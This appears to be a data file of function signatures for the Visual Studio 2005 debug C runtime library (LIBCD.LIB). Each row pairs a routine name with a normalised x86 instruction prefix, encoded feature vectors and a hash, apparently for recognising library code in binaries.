+__setdefaultprecision,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",8M/jMQAAAAAAAAAA,7h0umAAAAAAAAAAA,195c3161618750f10a802965ca9190e0a41be28a,VS2005,LIBCD.LIB
+_wcscpy,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R16,WORD PTR DS:[R32]\nMOV WORD PTR DS:[R32],R16\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]",XqODJzWmiOYAAAAA1RzUtgAAAAAAAAAA6EX5tzWmiOYAAAAANaaI5tUc1LZeo4Mn,[],7b1663d5d222dcde1b4bcb460d4a021b5e997654,VS2005,LIBCD.LIB
+_wcscat,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nTEST R32,R32\nJCC CONST",6EX5tyEgQSUAAAAANaaI5tUc1LZeo4MnISBBJTWmiObIUl/XXqODJzWmiOYAAAAA1RzUtgAAAAAAAAAAyFJf1yEgQSUAAAAA,[],151cb98632f9952828cdb178b9c12ce18db45fcd,VS2005,LIBCD.LIB
+___multtenpow12,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,0\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",OCa1yVGiqzJeo4Mn+6yz5kA8EisAAAAAUaKrMkA8Eiv7rLPmQDwSK5yGUTgAAAAAnIZROJyGUTgCHF8VNRZyE0+LzAoAAAAAAhxfFZyGUTgAAAAAnIZROJyGUTgTp7q1T4vMCgAAAAAAAAAAN6PArZyGUTg1FnITE6e6tZyGUTgAAAAAnIZROE+LzAo4JrXJXqODJ5yGUTgAAAAA,[],c613ca62992658ca2cca9fb3e2eac70ed55283c7,VS2005,LIBCD.LIB
+___ld12mul,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R16,WORD PTR SS:[EBP+CONST]\nSUB CONST6,CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nJMP SHORT CONST",wLXSnsSmS/EAAAAAIsX0N2nNBgAAAAAAeFVteXhVbXmchlE4KdmrsFJnfwaDrkNe1x2+a0+LzAoAAAAAxKZL8cSmS/FSZ38Gg65DXlJnfwbUwvf7IZK583hT5SEG8GB6xKZL8UG64HAM+iLi1ML3+0+LzAoAAAAAac0GAHhT5SEG8GB6Oo27l8hSX9d80IORDPoi4sSmS/EAAAAAQN3BLtTZ7ssAAAAAnIZROMbGEmA6jbuXBvBgepyGUTgAAAAAUmd/BiLF9Dfjg6EMauOv5VJnfwYp2auwfNCDkcHYCxEHN6hBxKZL8ZyGUThCIgNL1Nnuy6PnruMkn7iCeFVtedsHce8GUrtKQiIDS8C10p4+yobZ44OhDCLF9Dcp2auwNSgL8NTZ7ssAAAAAhadBKbyoT194VW15VbLFEQAAAAAAAAAABlK7Sk+LzAoAAAAABzeoQV6jgycAAAAAPsqG2cC10p4AAAAAnIZROKPnruMkn7iCwLXSnsSmS/EAAAAAo+eu4yGSufMAAAAAKdmrsCLF9DeDrkNeJJ+4gjUoC/BA3cEuwdgLEV6jgycAAAAAeFVtebyoT19BuuBwg65DXiLF9DcGUrtKeFPlIcSmS/EAAAAABlK7Sk+LzAoAAAAA2wdx71JnfwZq46/lXqODJ16jgycAAAAAQbrgcJyGUTh4VW15nIZROEG64HC9GLO6QbrgcHhVbXm8qE9fvRizukG64HAAAAAAXqODJ3hVbXkAAAAAxsYSYFWyxRHXHb5rUmd/BsSmS/HAtdKeyFJf13hVbXkAAAAAT4vMCgAAAAAAAAAAvKhPX0+LzAoAAAAAeFVteVWyxRHXHb5r,[],ce1e31f708766941d54008255b8104ab488e567f,VS2005,LIBCD.LIB
+??9type_info@@QBEHABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",kQJKwQAAAAAAAAAA,B2Gehtok6RXYzQSmFMSIatok6RXYzQSm2M0EplLONpXEkqZoJu7hZVLONpUAAAAAxJKmaFFo1lAAAAAAESeFcFjaKDpRaNZQWNooOlFo1lCzTHFD2M0EplLONpUHYZ6G2iTpFQAAAAAAAAAATGFsVlFo1lAm7uFls0xxQ9ok6RXYzQSm2M0EplLONpUUxIhqWNooOrNMcUNhgyZHrZMNRVLONpVY2ig6Us42lQAAAAAAAAAAFMSIatok6RVMYWxWUWjWUNok6RXYzQSmYYMmR9ok6RWtkw1F2M0EplLONpUUxIhq2M0EplLONpUUxIhqFMSIatok6RXYzQSm,a6d852bd1b3b81955564de345101c141e9993471,VS2005,LIBCD.LIB
+??1type_info@@UAE@XZ,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",1Of26U+LzAoChxXJT4vMCgAAAAAAAAAAAocVyU+LzAoAAAAA,[],00a0fcac1ebe4d089403705576d49ed31771dc16,VS2005,LIBCD.LIB
+??8type_info@@QBEHABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",53dCwAAAAAAAAAAA,FMSIatok6RVMYWxWUWjWUNok6RXYzQSm2M0EplLONpUUxIhq2M0EplLONpUUxIhqTGFsVlFo1lAm7uFl2M0EplLONpUHYZ6GFMSIatok6RXYzQSmWNooOlFo1lCzTHFDYYMmR9ok6RWtkw1FFMSIatok6RXYzQSm2M0EplLONpXEkqZoESeFcFjaKDpRaNZQJu7hZVLONpUAAAAAxJKmaFFo1lAAAAAAUs42lQAAAAAAAAAArZMNRVLONpVY2ig6B2Gehtok6RXYzQSm2iTpFQAAAAAAAAAAs0xxQ9ok6RXYzQSm2M0EplLONpUUxIhqWNooOrNMcUNhgyZH,db1d79c3fb4633bf32248d7b8b55081d3b0c3cc4,VS2005,LIBCD.LIB
+??0type_info@@AAE@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP",NhQXGQAAAAAAAAAA,[],fa4e87450f8a129a4f6bd61ffd63fe83cfd3a266,VS2005,LIBCD.LIB
+??_Gtype_info@@UAEPAXI@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",MX02AAAAAAAAAAAAJi2KbzF9NgCfv+P5n7/j+TF9NgAAAAAA,[],5892807693f0d3652dc1a0d0e036ad06ff0757e1,VS2005,LIBCD.LIB
+??4type_info@@AAEAAV0@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",qj0gSgAAAAAAAAAA,[],6f964d74d66ee01c3e7cb5f838c4f6390cdfb632,VS2005,LIBCD.LIB
+?before@type_info@@QBEHABV1@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",/oaGNAAAAAAAAAAA,xHSwTwAAAAAAAAAAxJKmaFFo1lAAAAAAUs42lQAAAAAAAAAAB2Gehtok6RXYzQSm2iTpFQAAAAAAAAAAWNooOlFo1lCzTHFDs0xxQ9ok6RXYzQSmFMSIatok6RVMYWxW2M0EplLONpUUxIhqWNooOrNMcUNhgyZHYYMmR9ok6RWtkw1F2M0EplLONpUHYZ6GUWjWUNok6RXYzQSm2M0EplLONpUUxIhqTGFsVlFo1lDEdLBPESeFcFjaKDpRaNZQFMSIatok6RXYzQSmrZMNRVLONpVY2ig62M0EplLONpUUxIhqFMSIatok6RXYzQSm2M0EplLONpXEkqZo,0e2bb3c8af2fc7a317818c35bf2c9d48f0b71bd5,VS2005,LIBCD.LIB
+?raw_name@type_info@@QBEPBDXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV ESP,EBP\nPOP EBP",5SY95gAAAAAAAAAA,[],598effc1d3b2324dc0af09c2c9b8b248c973f67a,VS2005,LIBCD.LIB
+_modf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",s7sIfykfXFSchlE4KR9cVE+LzAoAAAAAT4vMCgAAAAAAAAAAemEd93OBsEsAAAAAnIZROL7pb8achlE4IpLonXOBsEsAAAAAnIZROGrWcvJeo4Mnc4GwS0+LzAoAAAAAatZy8k+LzAoAAAAAVgFc7Y2gHmyzuwh/vulvxk+LzAoAAAAAXqODJykfXFQAAAAAjaAebHphHfcikuid,[],a043b607bbd41ca28afa111ec37b0886979ac65f,VS2005,LIBCD.LIB
+__heapadd,"PUSH EBP\nMOV EBP,ESP\nMOV DWORD PTR DS:[0],CONST\nOR R32,CONST\nPOP EBP\nRETN",C8spewAAAAAAAAAA,[],43ffdcf3a1842d399ced4e926d2bacc44e260965,VS2005,LIBCD.LIB
+__global_unwind2,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH EBP\nPUSH CONST\nPUSH CONST",CE0YgQAAAAAAAAAA,/k/SaAAAAAAAAAAA,ab81d8e1913c531357b65f2932a50c6582d9bce4,VS2005,LIBCD.LIB
+__NLG_Dispatch,POP R32\nPOP R32\nRETN CONST,thT/cgAAAAAAAAAA,[],00fee282e115bcc0153c4698853e2ca15ba9efdd,VS2005,LIBCD.LIB
+__abnormal_termination,"XOR R32,R32\nMOV R32,DWORD PTR FS:[0]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",yHOnCgAAAAAAAAAAwxwIbgGhdbPIc6cKnH7raQGhdbPDHAhuAaF1swAAAAAAAAAA,[],25dd49abe321768562e5498b90963bc1879f1daf,VS2005,LIBCD.LIB
+__NLG_Notify,"PUSH R32\nPUSH R32\nMOV R32,0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],EBP\nPOP R32",Zj3ApgAAAAAAAAAA,[],e2dfe0dc18f77a56a1646de38489656df393013c,VS2005,LIBCD.LIB
+__local_unwind2,"LEA R32,DWORD PTR DS:[R32+R32*2]\nMOV R32,DWORD PTR DS:[R32+R32*4]\nMOV DWORD PTR SS:[ESP+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nCMP DWORD PTR DS:[R32+R32*4+CONST],0\nJCC CONST",LqVGBF6jgycAAAAAXqODJ1Bj7vIAAAAADFjwyAAAAAAAAAAAUGPu8gxY8MichlE4bJ2YngxY8MichlE4nIZROAxY8MgupUYE,[],191c373f85ee0f43a00edddeca20306cdffb40bd,VS2005,LIBCD.LIB
+__NLG_Notify1,"MOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],EBP\nPOP R32\nPOP R32\nRETN CONST",mVSrgwAAAAAAAAAATnz83JlUq4MAAAAA,[],1ea3c8380e739200a7cdd44cf657af1346ad854a,VS2005,LIBCD.LIB
+__NLG_Return2,"ADD BYTE PTR DS:[R32],R8\nADD BYTE PTR DS:[R32+CONST],R8\nOR BYTE PTR DS:[R32+CONST],R8\nOR R8,CONST\nPOP R32\nRETN CONST",XqODJwW32FsAAAAABbfYWwAAAAAAAAAA,[],aaa8b421e6f5f6669ac8437daf3b484085c85c17,VS2005,LIBCD.LIB
+__mbctombb,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32*4+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",u4+PoEFF0Bsxk1Kmy4LLlU+LzAoAAAAAwbO6SDUWchOchlE4nIZROH5GQ3TvFmPXXqODJ9TZ7ssAAAAA6xCeREFF0Bsxk1KmfkZDdEFF0Bv0Ke4I7xZj116jgyfzmtTnNRZyE7uPj6AAAAAAMZNSpsGzukiUNGQA85rU50+LzAoAAAAAQUXQG0+LzAoAAAAAlDRkAE+LzAoAAAAA9CnuCJyGUTgAAAAAT4vMCgAAAAAAAAAA9CnuCOsQnkQAAAAAUgQ0WfQp7gjLgsuVnIZRODUWchOkIBux1Nnuy35GQ3TvFmPXpCAbsTUWchMEK8PlBCvD5U+LzAoAAAAA,[],92b6144c0312b934f912b44841f50fc88be507d0,VS2005,LIBCD.LIB
+__mbbtombc,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32*4]\nTEST R32,R32\nJCC CONST",iw0UTEFF0BuLDRRMu4+PoEFF0Bv6vh2J6xCeREFF0Bv6vh2JzwPJtkFF0BsAAAAAiw0UTEFF0Bv0Ke4Iy4LLlU+LzAoAAAAAiw0UTIsNFEyXcVGe9CnuCOsQnkQAAAAAnIZROIsNFEychlE4+r4diV6jgyfPA8m2nIZROIsNFEzXrudtXqODJ7uPj6AAAAAAQUXQG0+LzAoAAAAAl3FRnk+LzAoAAAAAMJJdppyGUTjLgsuVT4vMCgAAAAAAAAAA167nbU+LzAoAAAAA,[],ed9051dd4021ee274a0f0c526cc16d4f8c3768a3,VS2005,LIBCD.LIB
+_clearerr,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",a11M0+RSvJ+S9NEBnIZROORSvJ+S9NEBnVoi5l1c0u8AAAAAdYMGr5yGUTintFwk5FK8n5yGUTintFwklnPwX11c0u8AAAAAkvTRAeRSvJ91gwavp7RcJJZz8F+dWiLmXVzS7wAAAAAAAAAA,[],9342cbea67e8b4da538edd44a5054b16d303e6d9,VS2005,LIBCD.LIB
+__ismbslead,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",DczAAQDh1msAAAAAOWijNIOuQ14NzMABDczAAQDh1msAAAAAd9y22MhSX9egs8mOJu7hZQDh1msAAAAAxJKmaADh1msAAAAAAOHWawAAAAAAAAAAg65DXibu4WXh2QV54dkFechSX9cNzMAB4dkFeSbu4WV33LbYoLPJjuHZBXnEkqZoyFJf14OuQ14AAAAA,[],b88b2a72bc81625e834f023e9b717cc73e2e20b9,VS2005,LIBCD.LIB
+__memicmp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nOR R32,R32\nJCC CONST",fKNnppfae5TYzQSm2M0EptjNBKbYzQSm2M0EptjNBKaymcisspnIrNjNBKYAAAAA2M0EptjNBKbYzQSm2M0EptjNBKaymcisspnIrNjNBKYAAAAA2M0EpuhVq9qX2nuUl9p7lHyjZ6Zeo4MnXqODJ8TZicAAAAAA6FWr2sTZicANzMABDczAAcTZicAAAAAA4zskmXyjZ6YAAAAAfKNnppfae5Q4uSkrOLkpK+hVq9qX2nuUFp+5AMTZicA11bmal9p7lHyjZ6Zeo4MnXqODJ8TZicAAAAAA6FWr2sTZicAm7uFlNdW5muM7JJkmLoOhJu7hZcTZicAAAAAAxNmJwAAAAAAAAAAAJi6DoXyjZ6YAAAAA,[],cf120c5b108d234aefaac7beafab54c780da93f9,VS2005,LIBCD.LIB
+__filelengthi64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",f3RdOK9qLvEixfQ3g65DXr/RaZ2RSd71IsX0N7/RaZ0AAAAADYriak+LzAoAAAAABmKIw390XTgNiuJqv9FpnU+LzAoAAAAAr2ou8ZFJ3vWDrkNe7bLtNw2K4moGYojDT4vMCgAAAAAAAAAAkUne9b/RaZ0AAAAA,[],5ded27a784f21b45c27f146dc3a13fc8c8f267bd,VS2005,LIBCD.LIB
+_memset,"XOR R32,R32\nMOV R8,BYTE PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,R32\nCMP R32,CONST\nJCC CONST",LQza9kBZlEo20MRJOxWXD7ygXejWrd87nnqiNkNQbiQFHO/vBRzv7wUc7+9AWZRKBRzv7wUc7+9DUG4kQFmUSgUc7++eeqI21q3fOwUc7+8tDNr2Q1BuJAAAAAAAAAAAvKBd6AAAAAAAAAAANtDESQUc7+9AWZRK,[],cfb1ed5619cbd5001985d41686d69711774fa5ca,VS2005,LIBCD.LIB
+_localtime,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nSUB R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",A76Dxx5NEIhmeTE1v0rWWL9K1liwp3FNNRZyE0FF0BsAAAAAZnkxNU+LzAoAAAAAqKqWLbISh3kmhQp85hh+f5yGUTh9veEQHk0QiKiqli0O3+SQemun/kFF0BsAAAAADt/kkKiqli1euCHdfb3hEEFF0BsAAAAAJoUKfIc366EAAAAAXrgh3TUWchMvAnJCsKdxTb9K1lgAAAAAshKHeYc366EAAAAAv0rWWOYYfn+wp3FNQVPr10FF0BsAAAAAhzfrob9K1ljGS8OpLwJyQjUWchMAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROEFF0BsebBaHHmwWh0FT69d6a6f+xkvDqb9K1lgAAAAAsKdxTeYYfn8AAAAA,[],2024bb6e4fda44f50d33d75b1dd4e768c682053b,VS2005,LIBCD.LIB
+_fgetwc,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOVSX R32,BYTE PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R16,CONST\nJMP SHORT CONST",T4vMCgAAAAAAAAAAzax436e0XCR+/ZxhNZqLKJZ8m6/NYZih8gsfe5Z8m6/NYZihfv2cYfdPgS03oTO2p7RcJPdPgS25beHXzWGYoU+LzAoAAAAAN6Eztop3DJgAAAAAS5ltOKe0XCQp2auwlnybr0+LzAoAAAAAp7RcJJ+/4/kaggVKuW3h14p3DJgAAAAAKdmrsJSWRFydWiLm90+BLTWaiyjFWnUD90+BLfIN++r+o4/InVoi5s2seN8AAAAAGoIFSk+LzAoAAAAAincMmDWaiyjFWnUDincMmPIN++r+o4/IxVp1A0+LzAoAAAAA/qOPyE+LzAoAAAAAn7/j+U+LzAoAAAAA8g376vILH3untFwklJZEXKe0XCR+/Zxh,[],971659e27ddc9abae86970fd00ee1c39761d583f,VS2005,LIBCD.LIB
+_getwc,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",NV3SuwAAAAAAAAAA,8g376vILH3untFwklnPwX82seN8AAAAAN6Eztop3DJgAAAAAT4vMCgAAAAAAAAAAzax436e0XCR+/ZxhNZqLKJZ8m6/NYZih8gsfe5Z8m6/NYZihfv2cYZfgkLE3oTO2p7RcJPdPgS25beHXzWGYoU+LzAoAAAAAuW3h14p3DJgAAAAAS5ltOKe0XCQp2auwlnybr0+LzAoAAAAAp7RcJJ+/4/kaggVKKdmrsJZz8F+dWiLm90+BLTWaiyjFWnUDl+CQsYp3DJgAAAAAnVoi5s2seN8AAAAAGoIFSk+LzAoAAAAAincMmDWaiyjFWnUDincMmPIN++r+o4/IxVp1A0+LzAoAAAAA/qOPyE+LzAoAAAAAn7/j+U+LzAoAAAAA,a1cd9a193cdca3f0d3bd9876c6debf52e442d563,VS2005,LIBCD.LIB
+__calloc_base,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",LwJyQjUWchMNzMABwPUcYjqNu5cAAAAAh8JNNDqNu5cAAAAAnIZROJyGUTiwjT/1T6vMHJyGUTjpl+zInIZROKA3OqEkA8OdDczAAU+LzAoAAAAAOo27l5yGUTjuiKz+JAPDnS8CckKgNzqhNRZyEzqNu5cAAAAAsI0/9ZyGUTgAAAAAnIZROIfCTTTA9RxiT4vMCgAAAAAAAAAA6ZfsyJyGUTiwjT/1oDc6oU+LzAoAAAAAM0S0MjqNu5echlE47ois/pyGUThPq8wc,[],a001fee3e4a9a9d7cb254e64fe71e507ed268110,VS2005,LIBCD.LIB
+__wfullpath,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR DS:[0],CONST\nXOR R32,R32\nJMP SHORT CONST",nIZROEFF0BuchlE4nIZROLzzLWTnEgC4vPMtZE+LzAoAAAAA5xIAuE+LzAoAAAAAISBBJZyGUTgrieMfnIZROPh3+cE1dZFUnIZROI7ewlBo6LBJNXWRVPQp7gi88y1kQUXQG0+LzAoAAAAAaOiwSU+LzAoAAAAAT4vMCgAAAAAAAAAA9CnuCJCykekAAAAAK4njH0+LzAoAAAAAvPMtZE+LzAoAAAAA+Hf5wZCykekAAAAAjt7CUE+LzAoAAAAAVaatKCuJ4x8hIEElkLKR6ZyGUTichlE4,[],0a8640ae97a2abed39ecafadcc97c86044bd1974,VS2005,LIBCD.LIB
+__wutime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",WHP5ziyRF7LEkqZoxJKmaE+LzAoAAAAALJEXsgAAAAAAAAAAT4vMCgAAAAAAAAAA,[],1f61f2eb4dbebf37a146a1edd13b003a994a6870,VS2005,LIBCD.LIB
+__ftime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nCDQ\nMOV R32,CONST\nIDIV R32",iw0UTBmmZv9SZ38G1iMmOylyhcWLDRRMNQhbagAAAAAAAAAAGaZm/zhtDnIAAAAAUmd/BhmmZv+chlE4nIZROBmmZv8Zpmb/XqODJzhtDnIAAAAAKXKFxQAAAAAAAAAAvQ9BlDUIW2rWIyY7GaZm/16jgycAAAAAOG0OcgAAAAAAAAAA,[],a5f7ba2ea3a192294cb2b9b1220ace3b2eee6f7f,VS2005,LIBCD.LIB
+__fileno,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPOP EBP\nRETN",aKHdtwAAAAAAAAAA,[],f9a5d95ad6d0e223856e746111c1f99e1a2afee3,VS2005,LIBCD.LIB
+__close,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",5lwUK/Qp7gichlE46KRdaC+iRdUAAAAABmKIw+ZcFCvopF1o54Ey8Cbu4WWZeO5vnIZROBwZFJpyLOdamXjuby+iRdUAAAAA9CnuCOeBMvAAAAAAE2B68ibu4WWZeO5vnIZROHIs51qchlE4ciznWvQp7ggcGRSaNe7vLeikXWgGYojDHBkUmhNgevL0Ke4IJu7hZS+iRdUAAAAAL6JF1QAAAAAAAAAA,[],c197ad6776c434bd764faad773435db29a403c61,VS2005,LIBCD.LIB
+__ismbcupper,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,CONST\nSETE R8",QiIDS5Zz8F/0Ke4IDczAAU+LzAoAAAAA9CnuCKA3OqEAAAAAUmd/BpZz8F9CIgNLmdT0gGs/0wQNzMABlnPwX6A3OqEAAAAAT4vMCgAAAAAAAAAAoDc6oU+LzAoAAAAASsDrlhxZ/uSZ1PSADczAAU+LzAoAAAAAHFn+5E+LzAoAAAAAaz/TBFJnfwYNzMAB,[],243b7a59f5029bf3379b6b50923c3e75b69e3f31,VS2005,LIBCD.LIB
+__mbscmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,R32\nSETLE R8\nDEC R32",zgSLcc4Ei3Hh2QV50eac0/MRN8sAAAAAK4njH0+LzAoAAAAAyJ7an0+LzAoAAAAA2wdx7zUWchMNzMABzgSLcbk2qHzh2QV5T4vMCgAAAAAAAAAA9CnuCPMRN8sAAAAA4dkFedHmnNP0Ke4I8xE3y84Ei3EAAAAAuTaofNsHce/Intqf0eac0/MRN8sAAAAADczAAU+LzAoAAAAA4dkFedHmnNP0Ke4INRZyE84Ei3EAAAAA8xE3y7k2qHwAAAAAEIVrf84Ei3ErieMf9CnuCPMRN8sAAAAA,[],297ed329116eb7ab9e515a4d626953e871f6356d,VS2005,LIBCD.LIB
+_ldiv,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ\nIDIV DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",SCQihgAAAAAAAAAAnIZROEgkIobxBcUz8QXFM0gkIoYAAAAAoS4wyUgkIoachlE4,[],2d41a5ea1b599e96f58bebc7bc718882e9c3cf4e,VS2005,LIBCD.LIB
+__wperror,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP DWORD PTR DS:[0],0\nJCC CONST",NRZyE0+LzAoAAAAATuRvYiIrAagAAAAAwo3JBU+LzAoAAAAAsBVrJ0+LzAoAAAAAPzQl10nzEZk1FnITT4vMCgAAAAAAAAAAi7cTLLAVaycUZSvoTAx2DU+LzAoAAAAASfMRmZyGUTjCjckFIisBqLAVayeLtxMsnIZROCIrAaikF2NvFGUr6EwMdg0AAAAApBdjbyIrAahO5G9i,[],893473d39f71ad9e4351092a5b4d4f30a34fdc56,VS2005,LIBCD.LIB
+__wcsicoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",Jk68+0+LzAoAAAAA2jcg2k+LzAoAAAAAPz4kcdo3INomTrz7chMCgD8+JHFAPBIrT4vMCgAAAAAAAAAAQDwSK0+LzAoAAAAA,[],df37462cf0461ca373dfa21bd39ed60bc3e829bf,VS2005,LIBCD.LIB
+__wcsnicmp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",zPytZtUc1LbRSJSlLeDKHAAAAAAAAAAAxR3xreh+J0xeo4Mn6H4nTJN5sDTofidMXqODJy3gyhwAAAAAmSyGvS3gyhzbB3HvMFamlZkshr0t4MocGPmWWF6jgyfbB3Hvv5o+w4RPSnoAAAAAk3mwNBj5lljofidM6H4nTJN5sDS/mj7DCw2xel6jgyfbB3Hv6H4nTBj5lli/mj7D1RzUtgAAAAAAAAAA0UiUpZkshr3ofidMhE9Kehj5lljofidMv5o+wwsNsXoAAAAA2wdx7y3gyhwwVqaV2wdx716jgyfFHfGt,[],31f4f265939a5cb01ea42c531d9261e704f56586,VS2005,LIBCD.LIB
